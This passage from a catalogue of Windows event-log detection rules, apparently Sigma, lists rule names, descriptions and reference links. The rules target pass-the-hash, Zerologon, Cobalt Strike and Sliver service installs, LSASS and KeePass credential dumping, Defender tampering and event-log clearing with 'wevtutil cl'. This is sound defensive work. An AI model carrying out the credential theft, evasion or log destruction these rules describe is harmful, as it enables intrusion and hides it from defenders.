Detects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port. |
https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html, https://twitter.com/Purp1eW0lf/status/1616144561965002752 |
Pass the Hash Activity 2 |
Detects the attack technique pass the hash which is used to move laterally inside the network |
https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events, https://web.archive.org/web/20170909091934/https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis, https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/ |
External Remote SMB Logon from Public IP |
Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port. |
https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html, https://twitter.com/Purp1eW0lf/status/1616144561965002752 |
Failed Logon From Public IP |
Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary. |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4625 |
Potential Privilege Escalation via Local Kerberos Relay over LDAP |
Detects a suspicious local successful logon event where the Logon Package is Kerberos, the remote address is set to localhost, and the target user SID is the built-in local Administrator account.
This may indicate an attempt to leverage a Kerberos relay attack variant that can be used to elevate privilege locally from a domain joined limited user to local System privileges.
|
https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g, https://github.com/elastic/detection-rules/blob/5fe7833312031a4787e07893e27e4ea7a7665745/rules/_deprecated/privilege_escalation_krbrelayup_suspicious_logon.toml#L38 |
Outgoing Logon with New Credentials |
Detects logon events that specify new credentials |
https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf |
RottenPotato Like Attack Pattern |
Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like |
https://twitter.com/SBousseaden/status/1195284233729777665 |
Successful Account Login Via WMI |
Detects successful logon attempts performed with WMI |
Internal Research |
Windows Filtering Platform Blocked Connection From EDR Agent Binary |
Detects a Windows Filtering Platform (WFP) blocked connection event involving common Endpoint Detection and Response (EDR) agents.
Adversaries may use WFP filters to prevent Endpoint Detection and Response (EDR) agents from reporting security events.
|
https://github.com/netero1010/EDRSilencer, https://github.com/amjcyber/EDRNoiseMaker, https://ghoulsec.medium.com/misc-series-4-forensics-on-edrsilencer-events-428b20b3f983 |
Microsoft Defender Blocked from Loading Unsigned DLL |
Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL |
https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool |
Unsigned Binary Loaded From Suspicious Location |
Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations |
https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv |
HybridConnectionManager Service Running |
Rule to detect the Hybrid Connection Manager service running on an endpoint. |
https://twitter.com/Cyb3rWard0g/status/1381642789369286662 |
Suspicious Application Installed |
Detects suspicious application installed by looking at the added shortcut to the app resolver cache |
https://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3 |
Suspicious Rejected SMB Guest Logon From IP |
Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service |
https://twitter.com/KevTheHermit/status/1410203844064301056, https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/, https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare |
Sysmon Application Crashed |
Detects application popup reporting a failure of the Sysmon service |
https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/1803/W10_1803_Pro_19700101_17134.1/WEPExplorer/Application%20Popup.xml#L36 |
NTLMv1 Logon Between Client and Server |
Detects the reporting of NTLMv1 being used between a client and server. NTLMv1 is insecure as the underlying encryption algorithms can be brute-forced by modern hardware. |
https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/22H2/W10_22H2_Pro_20230321_19045.2728/WEPExplorer/LsaSrv.xml |
Active Directory Certificate Services Denied Certificate Enrollment Request |
Detects denied requests by Active Directory Certificate Services.
Example of these requests denial include issues with permissions on the certificate template or invalid signatures.
|
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd299871(v=ws.10), https://www.gradenegger.eu/en/details-of-the-event-with-id-53-of-the-source-microsoft-windows-certificationauthority/ |
DHCP Server Error Failed Loading the CallOut DLL |
This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded |
https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html, https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx, https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx |
DHCP Server Loaded the CallOut DLL |
This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded |
https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html, https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx, https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx |
Potential CVE-2021-42287 Exploitation Attempt |
The attacker creates a computer object using those permissions with a password known to her.
After that she clears the attribute ServicePrincipalName on the computer object.
Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.
|
https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/ |
Local Privilege Escalation Indicator TabTip |
Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode |
https://github.com/antonioCoco/JuicyPotatoNG |
Eventlog Cleared |
One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution |
https://twitter.com/deviouspolack/status/832535435960209408, https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100 |
Important Windows Eventlog Cleared |
Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by "wevtutil cl" command execution |
https://twitter.com/deviouspolack/status/832535435960209408, https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100 |
KDC RC4-HMAC Downgrade CVE-2022-37966 |
Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation |
https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d |
Certificate Use With No Strong Mapping |
Detects a user certificate that was valid but could not be mapped to a user in a strong way (such as via explicit mapping, key trust mapping, or a SID)
This could be a sign of exploitation of the elevation of privilege vulnerabilities (CVE-2022-34691, CVE-2022-26931, CVE-2022-26923) that can occur when the KDC allows certificate spoofing by not requiring a strong mapping.
Events where the AccountName and CN of the Subject do not match, or where the CN ends in a dollar sign indicating a machine, may indicate certificate spoofing.
|
https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16 |
No Suitable Encryption Key Found For Generating Kerberos Ticket |
Detects errors when a target server doesn't have suitable keys for generating kerberos tickets.
This issue can occur for example when a service uses a user account or a computer account that is configured for only DES encryption on a computer that is running Windows 7 which has DES encryption for Kerberos authentication disabled.
|
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd348773(v=ws.10), https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/kdc-event-16-27-des-encryption-disabled |
Critical Hive In Suspicious Location Access Bits Cleared |
Detects events from the Kernel-General ETW indicating that the access bits of a hive with a system like hive name located in the temp directory have been reset.
This occurs when an application tries to access a hive and the hive has not be recognized since the last 7 days (by default).
Registry hive dumping utilities such as QuarksPwDump were seen emitting this behavior.
|
https://github.com/nasbench/Misc-Research/blob/b20da2336de0f342d31ef4794959d28c8d3ba5ba/ETW/Microsoft-Windows-Kernel-General.md |
Volume Shadow Copy Mount |
Detects volume shadow copy mount via Windows event log |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy |
Suspicious Usage of CVE_2021_34484 or CVE 2022_21919 |
During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \Users\TEMP is created may be created during the exploitation. Viewed on 2008 Server |
https://packetstormsecurity.com/files/166692/Windows-User-Profile-Service-Privlege-Escalation.html |
Windows Update Error |
Detects Windows update errors including installation failures and connection issues. Defenders should observe this in case critical update KBs aren't installed.
|
https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/1903/W10_1903_Pro_20200714_18362.959/WEPExplorer/Microsoft-Windows-WindowsUpdateClient.xml |
Zerologon Exploitation Using Well-known Tools |
This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with "kali" hostname. |
https://www.secura.com/blog/zero-logon, https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382 |
Vulnerable Netlogon Secure Channel Connection Allowed |
Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472. |
https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc |
NTFS Vulnerability Exploitation |
This the exploitation of a NTFS vulnerability as reported without many details via Twitter |
https://twitter.com/jonasLyk/status/1347900440000811010, https://twitter.com/wdormann/status/1347958161609809921, https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/ |
Windows Defender Threat Detection Service Disabled |
Detects when the "Windows Defender Threat Protection" service is disabled. |
https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md |
CobaltStrike Service Installations - System |
Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement |
https://www.sans.org/webcasts/119395, https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/, https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ |
smbexec.py Service Installation |
Detects the use of smbexec.py tool by detecting a specific service installation |
https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/, https://github.com/fortra/impacket/blob/33058eb2fde6976ea62e04bc7d6b629d64d44712/examples/smbexec.py#L286-L296, https://github.com/fortra/impacket/blob/edef71f17bc1240f9f8c957bbda98662951ac3ec/examples/smbexec.py#L60 |
Invoke-Obfuscation CLIP+ Launcher - System |
Detects Obfuscated use of Clip.exe to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Obfuscated IEX Invocation - System |
Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references |
https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888 |
Invoke-Obfuscation STDIN+ Launcher - System |
Detects Obfuscated use of stdin to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation VAR+ Launcher - System |
Detects Obfuscated use of Environment Variables to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation COMPRESS OBFUSCATION - System |
Detects Obfuscated Powershell via COMPRESS OBFUSCATION |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Stdin - System |
Detects Obfuscated Powershell via Stdin in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation RUNDLL LAUNCHER - System |
Detects Obfuscated Powershell via RUNDLL LAUNCHER |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use Clip - System |
Detects Obfuscated Powershell via use Clip.exe in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use MSHTA - System |
Detects Obfuscated Powershell via use MSHTA in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use Rundll32 - System |
Detects Obfuscated Powershell via use Rundll32 in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System |
Detects Obfuscated Powershell via VAR++ LAUNCHER |
https://github.com/SigmaHQ/sigma/issues/1009 |
KrbRelayUp Service Installation |
Detects service creation from KrbRelayUp tool used for privilege escalation in Windows domain environments where LDAP signing is not enforced (the default settings) |
https://github.com/Dec0ne/KrbRelayUp |
Credential Dumping Tools Service Execution - System |
Detects well-known credential dumping tools execution via service execution events |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
Meterpreter or Cobalt Strike Getsystem Service Installation - System |
Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation |
https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ |
Moriya Rootkit - System |
Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report |
https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831 |
PowerShell Scripts Installed as Services |
Detects powershell script installed as a Service |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse |
Anydesk Remote Access Software Service Installation |
Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used. |
https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/ |
CSExec Service Installation |
Detects CSExec service installation and execution events |
https://github.com/malcomvetter/CSExec |
HackTool Service Registration or Execution |
Detects installation or execution of services |
Internal Research |
Mesh Agent Service Installation |
Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers |
https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ |
NetSupport Manager Service Install |
Detects NetSupport Manager service installation on the target system. |
http://resources.netsupportsoftware.com/resources/manualpdfs/nsm_manual_uk.pdf |
PAExec Service Installation |
Detects PAExec service installation |
https://www.poweradmin.com/paexec/ |
New PDQDeploy Service - Server Side |
Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.
PDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines
|
https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm |
New PDQDeploy Service - Client Side |
Detects PDQDeploy service installation on the target system.
When a package is deployed via PDQDeploy it installs a remote service on the target machine with the name "PDQDeployRunner-X" where "X" is an integer starting from 1
|
https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm |
ProcessHacker Privilege Elevation |
Detects a ProcessHacker tool that elevated privileges to a very high level |
https://twitter.com/1kwpeter/status/1397816101455765504 |
RemCom Service Installation |
Detects RemCom service installation and execution events |
https://github.com/kavika13/RemCom/ |
Remote Access Tool Services Have Been Installed - System |
Detects service installation of different remote access tools software. These software are often abused by threat actors to perform |
https://redcanary.com/blog/misbehaving-rats/ |
Remote Utilities Host Service Install |
Detects Remote Utilities Host service installation on the target system. |
https://www.remoteutilities.com/support/kb/host-service-won-t-start/ |
Sliver C2 Default Service Installation |
Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands |
https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231, https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/ |
Service Installed By Unusual Client - System |
Detects a service installed by a client which has PID 0 or whose parent has PID 0 |
https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html |
Suspicious Service Installation |
Detects suspicious service installation commands |
Internal Research |
PsExec Service Installation |
Detects PsExec service installation and execution events |
https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://jpcertcc.github.io/ToolAnalysisResultSheet |
Tap Driver Installation |
Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques |
https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers |
TacticalRMM Service Installation |
Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool. |
https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ |
Uncommon Service Installation Image Path |
Detects uncommon service installation commands by looking at suspicious or uncommon image path values containing references to encoded powershell commands, temporary paths, etc.
|
Internal Research |
Important Windows Service Terminated With Error |
Detects important or interesting Windows services that got terminated for whatever reason |
https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/ |
Windows Service Terminated With Error |
Detects Windows services that got terminated for whatever reason |
https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/ |
Important Windows Service Terminated Unexpectedly |
Detects important or interesting Windows services that got terminated unexpectedly. |
https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/ |
RTCore Suspicious Service Installation |
Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse |
https://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp |
Service Installation in Suspicious Folder |
Detects service installation in suspicious folder appdata |
Internal Research |
Service Installation with Suspicious Folder Pattern |
Detects service installation with suspicious folder patterns |
Internal Research |
Suspicious Service Installation Script |
Detects suspicious service installation scripts |
Internal Research |
Potential RDP Exploit CVE-2019-0708 |
Detect suspicious error on protocol RDP, potential CVE-2019-0708 |
https://web.archive.org/web/20190710034152/https://github.com/zerosum0x0/CVE-2019-0708, https://github.com/Ekultek/BlueKeep |
Scheduled Task Executed From A Suspicious Location |
Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task |
Internal Research |
Scheduled Task Executed Uncommon LOLBIN |
Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or where it is an unusual program to be run from a Scheduled Task |
Internal Research |
Important Scheduled Task Deleted |
Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities
|
https://www.socinvestigation.com/most-common-windows-event-ids-to-hunt-mind-map/ |
Ngrok Usage with Remote Desktop Service |
Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour |
https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg, https://ngrok.com/ |
Windows Defender Grace Period Expired |
Detects the expiration of the grace period of Windows Defender. This means protection against viruses, spyware, and other potentially unwanted software is disabled.
|
https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5101, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/ |
LSASS Access Detected via Attack Surface Reduction |
Detects Access to LSASS Process |
https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction |
PSExec and WMI Process Creations Block |
Detects blocking of process creations originating from PSExec and WMI commands |
https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-process-creations-originating-from-psexec-and-wmi-commands, https://twitter.com/duff22b/status/1280166329660497920 |
Windows Defender Exclusions Added |
Detects the Setting of Windows Defender Exclusions |
https://twitter.com/_nullbind/status/1204923340810543109 |
Windows Defender Exploit Guard Tamper |
Detects when someone is adding or removing applications or folders from exploit guard "ProtectedFolders" or "AllowedApplications"
|
https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088 |
Windows Defender Submit Sample Feature Disabled |
Detects disabling of the "Automatic Sample Submission" feature of Windows Defender. |
https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide, https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware |
Windows Defender Malware And PUA Scanning Disabled |
Detects disabling of the Windows Defender feature of scanning for malware and other potentially unwanted software |
https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5010, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/ |
Windows Defender Malware Detection History Deletion |
Windows Defender logs when the history of detected infections is deleted. |
https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus, https://web.archive.org/web/20160727113019/https://answers.microsoft.com/en-us/protect/forum/mse-protect_scanning/microsoft-antimalware-has-removed-history-of/f15af6c9-01a9-4065-8c6c-3f2bdc7de45e |
Windows Defender AMSI Trigger Detected |
Detects triggering of AMSI by Windows Defender. |
https://learn.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps |
Windows Defender Real-time Protection Disabled |
Detects disabling of Windows Defender Real-time Protection. As this event doesn't contain a lot of information on who initiated this action you might want to reduce it to a "medium" level if this occurs too many times in your environment
|
https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5001, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/ |
Windows Defender Real-Time Protection Failure/Restart |
Detects issues with Windows Defender Real-Time Protection features |
Internal Research, https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/, https://gist.github.com/nasbench/33732d6705cbdc712fae356f07666346 |
Win Defender Restored Quarantine File |
Detects the restoration of files from the defender quarantine |
https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide |
Windows Defender Configuration Changes |
Detects suspicious changes to the Windows Defender configuration |
https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide, https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware |
Microsoft Defender Tamper Protection Trigger |
Detects blocked attempts to change any of Defender's settings such as "Real Time Monitoring" and "Behavior Monitoring" |
https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection, https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide |
Windows Defender Threat Detected |
Detects actions taken by Windows Defender malware detection engines |
https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus |
Windows Defender Virus Scanning Feature Disabled |
Detects disabling of the Windows Defender virus scanning feature |
https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5012, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/ |
WMI Persistence |
Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs. |
https://twitter.com/mattifestation/status/899646620148539397, https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/ |
HackTool - CACTUSTORCH Remote Thread Creation |
Detects remote thread creation from CACTUSTORCH as described in references. |
https://twitter.com/SBousseaden/status/1090588499517079552, https://github.com/mdsecactivebreach/CACTUSTORCH |
HackTool - Potential CobaltStrike Process Injection |
Detects a potential remote threat creation with certain characteristics which are typical for Cobalt Strike beacons |
https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f, https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/ |
Remote Thread Created In KeePass.EXE |
Detects remote thread creation in "KeePass.exe" which could indicates potential password dumping activity |
https://www.cisa.gov/uscert/ncas/alerts/aa20-259a, https://github.com/denandz/KeeFarce, https://github.com/GhostPack/KeeThief |
Remote Thread Creation In Mstsc.Exe From Suspicious Location |
Detects remote thread creation in the "mstsc.exe" process by a process located in a potentially suspicious location.
This technique is often used by attackers in order to hook some APIs used by DLLs loaded by "mstsc.exe" during RDP authentications in order to steal credentials.
|
https://github.com/S12cybersecurity/RDPCredentialStealer/blob/1b8947cdd065a06c1b62e80967d3c7af895fcfed/APIHookInjectorBin/APIHookInjectorBin/Inject.h#L25 |
Potential Credential Dumping Attempt Via PowerShell Remote Thread |
Detects remote thread creation by PowerShell processes into "lsass.exe" |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse |
Password Dumper Remote Thread in LSASS |
Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.
The process in field Process is the malicious program. A single execution can lead to hundreds of events.
|
https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm |
Remote Thread Creation Via PowerShell In Uncommon Target |
Detects the creation of a remote thread from a Powershell process in an uncommon target process |
https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html |
Rare Remote Thread Creation By Uncommon Source Image |
Detects uncommon processes creating remote threads. |
Personal research, statistical analysis, https://lolbas-project.github.io |
Remote Thread Created In Shell Application |
Detects remote thread creation in command shell applications, such as "Cmd.EXE" and "PowerShell.EXE".
It is a common technique used by malware, such as IcedID, to inject malicious code and execute it within legitimate processes.
|
https://research.splunk.com/endpoint/10399c1e-f51e-11eb-b920-acde48001122/, https://www.binarydefense.com/resources/blog/icedid-gziploader-analysis/ |
Remote Thread Creation By Uncommon Source Image |
Detects uncommon processes creating remote threads. |
Personal research, statistical analysis, https://lolbas-project.github.io |
Remote Thread Creation In Uncommon Target Image |
Detects uncommon target processes for remote thread creation |
https://web.archive.org/web/20220319032520/https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection |
Remote Thread Creation Ttdinject.exe Proxy |
Detects a remote thread creation of Ttdinject.exe used as proxy |
https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/ |
Creation Of a Suspicious ADS File Outside a Browser Download |
Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers |
https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/ |
Hidden Executable In NTFS Alternate Data Stream |
Detects the creation of an ADS (Alternate Data Stream) that contains an executable by looking at a non-empty Imphash |
https://twitter.com/0xrawsec/status/1002478725605273600?s=21 |
Suspicious File Download From File Sharing Websites - File Stream |
Detects the download of suspicious file type from a well-known file and paste sharing domain |
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015, https://www.cisa.gov/uscert/ncas/alerts/aa22-321a, https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/ |
Unusual File Download From File Sharing Websites - File Stream |
Detects the download of suspicious file type from a well-known file and paste sharing domain |
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015, https://www.cisa.gov/uscert/ncas/alerts/aa22-321a, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/ |
HackTool Named File Stream Created |
Detects the creation of a named file stream with the imphash of a well-known hack tool |
https://github.com/gentilkiwi/mimikatz, https://github.com/topotam/PetitPotam, https://github.com/ohpe/juicy-potato, https://github.com/antonioCoco/RoguePotato, https://www.tarasco.org/security/pwdump_7/, https://github.com/fortra/nanodump, https://github.com/codewhitesec/HandleKatz, https://github.com/xuanxuan0/DripLoader, https://github.com/hfiref0x/UACME, https://github.com/outflanknl/Dumpert, https://github.com/wavestone-cdt/EDRSandblast |
Exports Registry Key To an Alternate Data Stream |
Exports the target Registry key and hides it in the specified alternate data stream. |
https://lolbas-project.github.io/lolbas/Binaries/Regedit/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f |
Unusual File Download from Direct IP Address |
Detects the download of suspicious file type from URLs with IP |
https://github.com/trustedsec/SysmonCommunityGuide/blob/adcdfee20999f422b974c8d4149bf4c361237db7/chapters/file-stream-creation-hash.md, https://labs.withsecure.com/publications/detecting-onenote-abuse |
Potential Suspicious Winget Package Installation |
Detects potential suspicious winget package installation from a suspicious source. |
https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget |
Potentially Suspicious File Download From ZIP TLD |
Detects the download of a file with a potentially suspicious extension from a .zip top level domain. |
https://twitter.com/cyb3rops/status/1659175181695287297, https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/ |
DNS Query for Anonfiles.com Domain - Sysmon |
Detects DNS queries for "anonfiles.com", which is an anonymous file upload platform often used for malicious purposes |
